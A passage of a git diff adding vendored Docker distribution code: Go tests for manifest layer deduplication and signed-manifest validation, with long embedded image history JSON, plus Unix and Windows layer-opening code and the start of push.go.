./...\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/bash\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":118430532}\n"},
+		},
+	}
+
+	duplicateLayerManifestExpectedOutput := schema1.Manifest{
+		FSLayers: []schema1.FSLayer{
+			{BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")},
+			{BlobSum: digest.Digest("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa")},
+		},
+		History: []schema1.History{
+			{V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT [\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"},
+			{V1Compatibility: "{\"id\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:07.568027497Z\",\"container\":\"fe9e5a5264a843c9292d17b736c92dd19bdb49986a8782d7389964ddaff887cc\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"cd /go/src/github.com/tonistiigi/dnsdock \\u0026\\u0026     go get -v github.com/tools/godep \\u0026\\u0026     godep restore \\u0026\\u0026     go install -ldflags \\\"-X main.version `git describe --tags HEAD``if [[ -n $(command git status --porcelain --untracked-files=no 2\\u003e/dev/null) ]]; then echo \\\"-dirty\\\"; fi`\\\" ./...\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/bash\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":118430532}\n"},
+		},
+	}
+
+	if err := fixManifestLayers(&duplicateLayerManifest); err != nil {
+		t.Fatalf("unexpected error from fixManifestLayers: %v", err)
+	}
+
+	if !reflect.DeepEqual(duplicateLayerManifest, duplicateLayerManifestExpectedOutput) {
+		t.Fatal("incorrect output from fixManifestLayers on duplicate layer manifest")
+	}
+
+	// Run fixManifestLayers again and confirm that it doesn't change the
+	// manifest (which no longer has duplicate layers).
+	if err := fixManifestLayers(&duplicateLayerManifest); err != nil {
+		t.Fatalf("unexpected error from fixManifestLayers: %v", err)
+	}
+
+	if !reflect.DeepEqual(duplicateLayerManifest, duplicateLayerManifestExpectedOutput) {
+		t.Fatal("incorrect output from fixManifestLayers on duplicate layer manifest (second pass)")
+	}
+}
+
+// TestFixManifestLayersBaseLayerParent makes sure that fixManifestLayers fails
+// if the base layer configuration specifies a parent.
+func TestFixManifestLayersBaseLayerParent(t *testing.T) {
+	// TODO Windows: Fix this unit text
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs fixing on Windows")
+	}
+	duplicateLayerManifest := schema1.Manifest{
+		FSLayers: []schema1.FSLayer{
+			{BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")},
+			{BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")},
+			{BlobSum: digest.Digest("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa")},
+		},
+		History: []schema1.History{
+			{V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT [\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"},
+			{V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT [\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"},
+			{V1Compatibility: "{\"id\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"parent\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"created\":\"2015-08-19T16:49:07.568027497Z\",\"container\":\"fe9e5a5264a843c9292d17b736c92dd19bdb49986a8782d7389964ddaff887cc\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"cd /go/src/github.com/tonistiigi/dnsdock \\u0026\\u0026     go get -v github.com/tools/godep \\u0026\\u0026     godep restore \\u0026\\u0026     go install -ldflags \\\"-X main.version `git describe --tags HEAD``if [[ -n $(command git status --porcelain --untracked-files=no 2\\u003e/dev/null) ]]; then echo \\\"-dirty\\\"; fi`\\\" ./...\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/bash\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":118430532}\n"},
+		},
+	}
+
+	if err := fixManifestLayers(&duplicateLayerManifest); err == nil || !strings.Contains(err.Error(), "invalid parent ID in the base layer of the image") {
+		t.Fatalf("expected an invalid parent ID error from fixManifestLayers")
+	}
+}
+
+// TestFixManifestLayersBadParent makes sure that fixManifestLayers fails
+// if an image configuration specifies a parent that doesn't directly follow
+// that (deduplicated) image in the image history.
+func TestFixManifestLayersBadParent(t *testing.T) {
+	duplicateLayerManifest := schema1.Manifest{
+		FSLayers: []schema1.FSLayer{
+			{BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")},
+			{BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")},
+			{BlobSum: digest.Digest("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa")},
+		},
+		History: []schema1.History{
+			{V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ac3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT [\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"},
+			{V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ac3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT [\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"},
+			{V1Compatibility: "{\"id\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:07.568027497Z\",\"container\":\"fe9e5a5264a843c9292d17b736c92dd19bdb49986a8782d7389964ddaff887cc\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"cd /go/src/github.com/tonistiigi/dnsdock \\u0026\\u0026     go get -v github.com/tools/godep \\u0026\\u0026     godep restore \\u0026\\u0026     go install -ldflags \\\"-X main.version `git describe --tags HEAD``if [[ -n $(command git status --porcelain --untracked-files=no 2\\u003e/dev/null) ]]; then echo \\\"-dirty\\\"; fi`\\\" ./...\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/bash\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":118430532}\n"},
+		},
+	}
+
+	if err := fixManifestLayers(&duplicateLayerManifest); err == nil || !strings.Contains(err.Error(), "Invalid parent ID.") {
+		t.Fatalf("expected an invalid parent ID error from fixManifestLayers")
+	}
+}
+
+// TestValidateManifest verifies the validateManifest function
+func TestValidateManifest(t *testing.T) {
+	// TODO Windows: Fix this unit text
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs fixing on Windows")
+	}
+	expectedDigest, err := reference.ParseNamed("repo@sha256:02fee8c3220ba806531f606525eceb83f4feb654f62b207191b1c9209188dedd")
+	if err != nil {
+		t.Fatal("could not parse reference")
+	}
+	expectedFSLayer0 := digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")
+
+	// Good manifest
+
+	goodManifestBytes, err := ioutil.ReadFile("fixtures/validate_manifest/good_manifest")
+	if err != nil {
+		t.Fatal("error reading fixture:", err)
+	}
+
+	var goodSignedManifest schema1.SignedManifest
+	err = json.Unmarshal(goodManifestBytes, &goodSignedManifest)
+	if err != nil {
+		t.Fatal("error unmarshaling manifest:", err)
+	}
+
+	verifiedManifest, err := verifySchema1Manifest(&goodSignedManifest, expectedDigest)
+	if err != nil {
+		t.Fatal("validateManifest failed:", err)
+	}
+
+	if verifiedManifest.FSLayers[0].BlobSum != expectedFSLayer0 {
+		t.Fatal("unexpected FSLayer in good manifest")
+	}
+
+	// "Extra data" manifest
+
+	extraDataManifestBytes, err := ioutil.ReadFile("fixtures/validate_manifest/extra_data_manifest")
+	if err != nil {
+		t.Fatal("error reading fixture:", err)
+	}
+
+	var extraDataSignedManifest schema1.SignedManifest
+	err = json.Unmarshal(extraDataManifestBytes, &extraDataSignedManifest)
+	if err != nil {
+		t.Fatal("error unmarshaling manifest:", err)
+	}
+
+	verifiedManifest, err = verifySchema1Manifest(&extraDataSignedManifest, expectedDigest)
+	if err != nil {
+		t.Fatal("validateManifest failed:", err)
+	}
+
+	if verifiedManifest.FSLayers[0].BlobSum != expectedFSLayer0 {
+		t.Fatal("unexpected FSLayer in extra data manifest")
+	}
+
+	// Bad manifest
+
+	badManifestBytes, err := ioutil.ReadFile("fixtures/validate_manifest/bad_manifest")
+	if err != nil {
+		t.Fatal("error reading fixture:", err)
+	}
+
+	var badSignedManifest schema1.SignedManifest
+	err = json.Unmarshal(badManifestBytes, &badSignedManifest)
+	if err != nil {
+		t.Fatal("error unmarshaling manifest:", err)
+	}
+
+	verifiedManifest, err = verifySchema1Manifest(&badSignedManifest, expectedDigest)
+	if err == nil || !strings.HasPrefix(err.Error(), "image verification failed for digest") {
+		t.Fatal("expected validateManifest to fail with digest error")
+	}
+}
diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_unix.go b/vendor/github.com/docker/docker/distribution/pull_v2_unix.go
new file mode 100644
index 0000000000..45a7a0c150
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/pull_v2_unix.go
@@ -0,0 +1,13 @@
+// +build !windows
+
+package distribution
+
+import (
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/context"
+)
+
+func (ld *v2LayerDescriptor) open(ctx context.Context) (distribution.ReadSeekCloser, error) {
+	blobs := ld.repo.Blobs(ctx)
+	return blobs.Open(ctx, ld.digest)
+}
diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_windows.go b/vendor/github.com/docker/docker/distribution/pull_v2_windows.go
new file mode 100644
index 0000000000..aefed86601
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/pull_v2_windows.go
@@ -0,0 +1,49 @@
+// +build windows
+
+package distribution
+
+import (
+	"net/http"
+	"os"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/context"
+	"github.com/docker/distribution/manifest/schema2"
+	"github.com/docker/distribution/registry/client/transport"
+)
+
+var _ distribution.Describable = &v2LayerDescriptor{}
+
+func (ld *v2LayerDescriptor) Descriptor() distribution.Descriptor {
+	if ld.src.MediaType == schema2.MediaTypeForeignLayer && len(ld.src.URLs) > 0 {
+		return ld.src
+	}
+	return distribution.Descriptor{}
+}
+
+func (ld *v2LayerDescriptor) open(ctx context.Context) (distribution.ReadSeekCloser, error) {
+	if len(ld.src.URLs) == 0 {
+		blobs := ld.repo.Blobs(ctx)
+		return blobs.Open(ctx, ld.digest)
+	}
+
+	var (
+		err error
+		rsc distribution.ReadSeekCloser
+	)
+
+	// Find the first URL that results in a 200 result code.
+	for _, url := range ld.src.URLs {
+		logrus.Debugf("Pulling %v from foreign URL %v", ld.digest, url)
+		rsc = transport.NewHTTPReadSeeker(http.DefaultClient, url, nil)
+		_, err = rsc.Seek(0, os.SEEK_SET)
+		if err == nil {
+			break
+		}
+		logrus.Debugf("Download for %v failed: %v", ld.digest, err)
+		rsc.Close()
+		rsc = nil
+	}
+	return rsc, err
+}
diff --git a/vendor/github.com/docker/docker/distribution/push.go b/vendor/github.com/docker/docker/distribution/push.go
new file mode 100644
index 0000000000..d35bdb103e
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/push.go
@@ -0,0 +1,186 @@
+package distribution
+
+import (
+	"bufio"
+	"compress/gzip"
+	"fmt"
+	"io"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/distribution/metadata"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"golang.org/x/net/context"
+)
+
+// Pusher is an interface that abstracts pushing for different API versions.
+type Pusher interface {
+	// Push tries to push the image configured at the creation of Pusher.
+	// Push returns an error if any, as well as a boolean that determines whether to retry Push on the next configured endpoint.
+	//
+	// TODO(tiborvass): have Push() take a reference to repository + tag, so that the pusher itself is repository-agnostic.
+	Push(ctx context.Context) error
+}
+
+const compressionBufSize = 32768
+
+// NewPusher creates a new Pusher interface that will push to either a v1 or v2
